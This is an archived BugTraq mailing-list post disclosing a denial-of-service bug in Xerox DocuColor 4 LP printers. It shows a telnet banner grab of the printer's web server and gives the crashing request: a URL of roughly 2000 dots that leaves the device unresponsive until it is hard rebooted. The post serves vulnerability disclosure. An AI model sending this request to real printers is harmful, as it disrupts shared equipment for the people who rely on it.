This is a multi-part message in MIME format. ------=_NextPart_000_004B_01BF1567.52EAD640 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable BugTraq, I have found several bugs with XEROX network printers/copiers the = first I would like to share with you is the DocuColor 4 LP Denial of = Service attack. This attack can case the XEROX printer to become = completely unresponsive to pings and will not allow any thing to be = printed unless you give it a hard reboot. Worst of all you can do this = from any workstation that has access to the Fiery web based tools. This = can give your local XEROX guys fits. =20 [root@ns2 whis]# telnet x.x.x.x 80 Trying x.x.x.x ... Connected to x.x.x.x Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 200 OK Date: THU, 01 JAN 1970 GMT Server: Apache/1.0.3 Content-type: text/html [root@ns2 whis]# Connection closed by foreign host. Great now here's the D.O.S http://DocuColor/around2000dots/ and the = printer will have to be reset if you want to use it. I would like to say thank you to rain.forest.puppy. Jason Lutz Sprint Print Inc jasonat_private ------=_NextPart_000_004B_01BF1567.52EAD640 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2614.3500" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT size=3D2> <DIV><FONT size=3D2> <DIV> BugTraq,</DIV> <DIV> </DIV> <DIV> I have found several bugs with XEROX network = printers/copiers=20 the first I would like to share with you is the DocuColor 4 LP Denial of = Service=20 attack. This attack can case the XEROX printer to become completely = unresponsive=20 to pings and will not allow any thing to be printed unless you give it a = hard=20 reboot. Worst of all you can do this from any workstation that has = access to the=20 Fiery web based tools. This can give your local XEROX guys fits.</DIV> <DIV> <DIV><FONT size=3D2> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D3>[root@ns2 whis]# telnet x.x.x.x 80<BR>Trying x.x.x.x = ...<BR>Connected to x.x.x.x</FONT></DIV> <DIV><FONT size=3D3>Escape character is '^]'.<BR>GET / = HTTP/1.0</FONT></DIV> <DIV> </DIV> <DIV><FONT size=3D3>HTTP/1.0 200 OK<BR>Date: THU, 01 JAN 1970 = GMT<BR>Server:=20 Apache/1.0.3<BR>Content-type: text/html</FONT></DIV> <DIV> </DIV> <DIV><FONT size=3D3><FONT size=3D2><FONT size=3D3>[root@ns2 whis]# = Connection closed=20 by foreign host.</FONT></FONT></FONT></DIV> <DIV> </DIV> <DIV><FONT size=3D3>Great now here's the D.O.S <A=20 href=3D"http://DocuColor/around2000dots/">http://DocuColor/around2000dots= /</A> and=20 the printer will have to be reset if you want to use it.</FONT></DIV> <DIV> </DIV> <DIV><FONT size=3D3>I would like to say thank you to=20 rain.forest.puppy.</FONT></DIV> <DIV> </DIV> <DIV><FONT size=3D3>Jason Lutz</FONT></DIV> <DIV><FONT size=3D3>Sprint Print Inc</FONT></DIV> <DIV><FONT size=3D3><A=20 href=3D"mailto:jasonat_private">jasonat_private</A></FONT></DIV> <DIV> </DIV> <DIV> </DIV></FONT></DIV></DIV></FONT></DIV></FONT></DIV></BODY></HT= ML> ------=_NextPart_000_004B_01BF1567.52EAD640--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:30 PDT